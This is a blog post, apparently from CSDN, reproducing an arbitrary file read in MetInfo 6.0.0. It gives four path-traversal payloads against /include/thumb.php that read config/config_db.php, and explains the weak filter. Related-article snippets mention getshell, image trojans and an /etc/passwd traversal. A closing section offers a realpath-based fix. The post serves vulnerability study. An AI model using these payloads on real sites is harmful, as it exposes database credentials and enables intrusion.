metinfo 任意文件读取漏洞复现

最新推荐文章于 2024-05-10 23:56:01 发布

原创最新推荐文章于 2024-05-10 23:56:01 发布 · 199 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全

本文对metinfo任意文件读取漏洞进行复现，针对metinfo6.0.0版本抓包，利用/include/thumb.php作为漏洞点，通过四次不同方式构造payload成功利用漏洞。还简要解释了漏洞原因，代码中对dir的过滤条件简单，可用.\绕过。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

metinfo 任意文件读取漏洞复现

抓包metinfo6.0.0版本

漏洞利用点 /include/thumb.php

第一次利用

/include/thumb.php?dir=..././http/..././config/config_db.php

第二次利用

/include/thumb.php?dir=.....///http/.....///config/config_db.php

第三次利用

/include/thumb.php?dir=http/.....///.....///config/config_db.php

第四次利用

/include/thumb.php?dir=http\..\..\config\config_db.php

成功利用漏洞

简要解释漏洞产生的原因

从代码分析得知dir直接由_GET[‘dir’]传递进来，设置了过滤条件，但是只设置了过滤"../"和“./”和请求头部是“http”开始，这样的过滤显然太简单了，我们可以用.\进行绕过构造payload。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

池央_

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

metinfo_6.0.0 任意文件读取漏洞复现

薛定谔嘚喵博客

05-04

1138

MetInfo是一套使用PHP和Mysql开发的内容管理系统。MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。

文件读取漏洞复现（Metinfo 6.0.0）

m0_56578216的博客

08-31

1055

安装phpstudy，下载MetInfo 6.0.0版本软件，复制到phpstudy目录下的www目录中。

参与评论您还未登录，请先登录后发表或查看评论

【MetInfo任意文件读取】--任意文件读取漏洞

m0_63241485的博客

08-29

4095

任意文件读取漏洞分析

php代码审计【20】MetInfo 变量覆盖漏洞挖掘

司徒荆的博客

07-06

1026

MetInfo 变量覆盖漏洞挖掘

Metinfo v6.0.0 后台getshell

公众号shadow sock7

10-21

3912

这个漏洞在v5.3.19同样存在，不过前提是需要后台管理员的权限。但是如果是在v5.3.19，可以结合之前的管理员任意密码重置漏洞getshell。 Metinfo v5.3.19: 如文章中所说，这里的poc是： http://localhost/admin/column/save.php? name=123 &action=editor &foldername=upload &...

【漏洞复现】Metinfo5.0.4任意文件包含漏洞复现

过期的秋刀鱼

11-04

890

文件夹中有个新建文件shell.php，即可用蚁剑连接。下放入一张没有木马的图片，使用另一种方式制作图片木马。，当我们直接包含图片的时候，这段代码就会被执行。复制得到的base64编码格式的php代码。该段代码的含义是，在当前目录下创建一个名为。把POST请求体中的变量放到url中提交。，然后在下面写入php代码，点击send。上传图片木马，通过文件包含的方式去访问。bp拦截得到php源码的数据包。使用文件包含的方式去访问图片。该环境的文件上传点在。但是上传文件会失败，拿到webshell。

记一次MetInfo6.0.0文件包含漏洞复现

weixin_55404107的博客

10-20

1931

进行漏洞复现，读取敏感文件

metinfo_5.0.4 任意文件本地包含漏洞复现（metinfo_5.0.4_lfi）

薛定谔嘚喵博客

05-06

750

include/module.php” 和 $mouble 这个变量，进行跟踪，打开 …/include/module.php，module.php里还包含着 “common.inc.php” ，我们先对module.php进行代码审计。可以看到当fmodule这个变量不等于7时，它就会对$module进行验证，接着对"common.inc.php"进行跟踪。发现common.inc.php的这段代码有漏洞点，双$$符号可能存在变量覆盖漏洞。我们要让fmodule=7，绕过对$module的验证。

metinfo中csrf漏洞复现

qq_44268631的博客

08-07

415

metinfo中csrf漏洞复现打开后台登陆http://localhost/metinfo/admin/index.php，查看添加管理员代码发现并没有验证token 在添加管理界面随便输入一个管理信息点击保存使用 urpsuit抓包右键选择send to repeater 在repeater界面，右键打开cenerate csrf poc copy软件生成的poc脚本把保存的poc放在软件同附站下，访问点击，就可以在后台生成新的管理员账户总结：漏洞比较鸡肋，必须拿到同站点才

【漏洞复现】Metinfo6.0.0任意文件读取

过期的秋刀鱼

08-31

2958

dir变量接受来自$_GET[‘dir’]传递进来的值，用了str_replace函数做替换，将。漏洞简介：MetInfo是一套使用PHP和MySQL开发的内容管理系统，其中的。文件存在任意文件读取漏洞，攻击者可利用该漏洞读取网站的敏感文件。漏洞名称：MetInfo任意文件读取。影响版本：MetInfo 6.0.0。

metinfo 6.0.0任意文件读取漏洞复现

SUPER131110的博客

09-01

475

设置了过滤条件，但是只设置了过滤"../"和“./”和请求头部是“http”开始，这样的过滤显然太简单了，我们可以用.\进行绕过构造payload。- 涉及的版本或软件(CMS版本、浏览器版本等)dir直接由_GET[‘dir’]传递进来。重现攻击过程所需的 payload。metinfo任意文件读取漏洞。简要解释漏洞产生的原因。打补丁，升级，上设备。

通过浏览器URL地址，5分钟内渗透你的网站！很刑很可拷！

瓦罗兰特顶级C位的博客

02-01

2205

今天我来带大家简单渗透一个小破站，通过这个案例，让你深入了解为什么很多公司都需要紧急修复各个中间件的漏洞以及进行URL解析拦截等重要操作。

学习笔记-B/S - Exploits

热门推荐

人饭子的博客

11-02

4万+

B/S - Exploits 免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲各类论坛/CMS框架 AEM 74CMS dedeCMS Discuz Discuz Discuz!ML Drupal ECshop Fastadmin Laravel jeecg jeewms Joomla Maccms MetIn...

漏洞挖掘姿势之metinfo 建站系统-任意文件读取漏洞

Grace_for_it的博客

05-10

745

metinfo 建站系统 任意文件读取漏洞漏洞挖掘

metinfo 5.3.19密码重置漏洞

公众号shadow sock7

10-17

3755

安装完成之后，即便之前已经将各目录设置为777了，到这一步时，也会将confg/config_db.php设置为只读。查看改文件，发现确实是刚修改的。步骤先在一台metinfo服务器能访问的机器上设置监听80端口，如果metinfo能访问公网则可以设置公网服务器的IP，这里我就只设置为我metinfo所在虚拟机的宿主机的IP了。 C:\Users\caiqiqi&gt;ncat -lvv...

config.db.php,数据库配置（$config[db]）

weixin_32818781的博客

03-10

1153

## 数据库配置微擎系统支持数据库的主从配置(一主多从)，只需要进行简单的配置即可。| 变量 | 描述 || --- | --- || $config\[‘db’\]\[‘master’\]\[‘host’\] | 数据库主机地址 || $config\[‘db’\]\[‘master’\]\[‘username’\] | 数据库用户名 || $config\[‘db’\]\[‘master’\]...

Metinfo 5.3 后台getshell（远程文件包含漏洞）分析

__Curtain_

08-30

6379

最近准备入代码审计的坑，拿Metinfo来练练手，先找了下以前的版本整理下思路。看了下大神的文章，代码审计的方法总体上分为两种： 1. 跟踪用户的输入数据，判断数据进入的每一个代码逻辑是否有可利用的点，此处的代码逻辑可以是一个函数，或者是条小小的条件判断语句。 2. 根据不同编程语言的特性，及其历史上经常产生漏洞的一些函数，功能，把这些点找出来，在分析函数调用时的参数，如果...

metinfo 6.0 任意文件读取漏洞

浅笑996的博客

12-20

2042

一、启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮，启动服务器环境二、代码审计 1．双击启动桌面Seay源代码审计系统软件 2．点击新建项目按钮，弹出对画框中选择（C:\phpStudy\WWW\metinfo），点击确定漏洞分析 1．点击展开左侧app\system\include\module\目录，在弹出的下拉列表中双击old_thumb.class.ph...

PHP任意文件读取漏洞

最新发布

07-08

### 任意文件读取漏洞详情 任意文件读取漏洞通常是指应用程序中存在某些功能允许攻击者通过构造特定的请求，访问或下载服务器上的任意文件。这类漏洞往往出现在处理文件读取或下载的功能模块中，尤其是在路径参数未经过严格校验的情况下。 PHP 中常见的文件读取函数包括 `readfile` 和 `file_get_contents` 等。如果这些函数的参数（例如文件路径）直接由用户输入控制，并且没有对路径进行严格的过滤和验证，则可能导致任意文件读取漏洞。例如： ```php <?php $filename = $_GET['file']; readfile($filename); ?> ``` 在上述代码中，若用户传入类似 `../../../../etc/passwd` 的路径，则可能绕过限制读取敏感文件 [^1]。此外，一些内容管理系统（CMS）或插件也可能存在此类漏洞。例如 MetInfo 6.0.0 ~ 6.1.0 版本中的 `/app/system/include/module/old_thumb.class.php` 文件存在任意文件读取漏洞，未经身份验证的攻击者可通过该漏洞读取网站上的敏感文件 [^2]。 ### 解决方案为了防止 PHP 应用程序出现任意文件读取漏洞，可以采取以下措施： 1. **避免直接使用用户输入作为文件路径**：尽量不要将用户输入直接用于文件操作，而是使用预定义的白名单机制来控制可访问的文件。 2. **严格校验输入路径**： - 使用正则表达式对输入进行匹配，确保其符合预期格式。 - 避免使用目录遍历字符如 `../` 或 `..\`。 - 使用 `realpath()` 或 `basename()` 等函数提取合法路径部分。 3. **设置文件访问权限**：确保应用程序只能访问指定目录下的文件，可以通过配置服务器环境变量（如 `open_basedir`）来限制 PHP 脚本能够访问的目录范围。 4. **更新和修补第三方组件**：对于使用的内容管理系统（如 WordPress、MetInfo 等），应及时更新到最新版本以修复已知的安全漏洞 [^4]。 5. **最小权限原则**：运行 Web 服务器时应使用最低权限账户，这样即使发生漏洞也不会导致整个系统被攻破。 6. **日志监控与异常处理**：记录所有可疑行为并设置警报机制，以便及时发现潜在威胁。 7. **安全编码实践**：开发过程中遵循安全编码规范，定期进行代码审查和渗透测试，提高整体安全性。 ### 示例修复代码下面是一个简单的修复示例，展示了如何限制用户只能访问特定目录下的文件： ```php <?php $allowedPath = '/var/www/html/files/'; $userInput = isset($_GET['file']) ? $_GET['file'] : ''; // 构造完整路径 $requestedFile = realpath($allowedPath . $userInput); // 检查是否在允许的目录内 if (strpos($requestedFile, $allowedPath) === 0 && is_file($requestedFile)) { readfile($requestedFile); } else { echo "Access denied."; } ?> ``` 在此示例中，只有当请求的文件位于 `$allowedPath` 目录下时才会被读取，从而有效防止了任意文件读取攻击。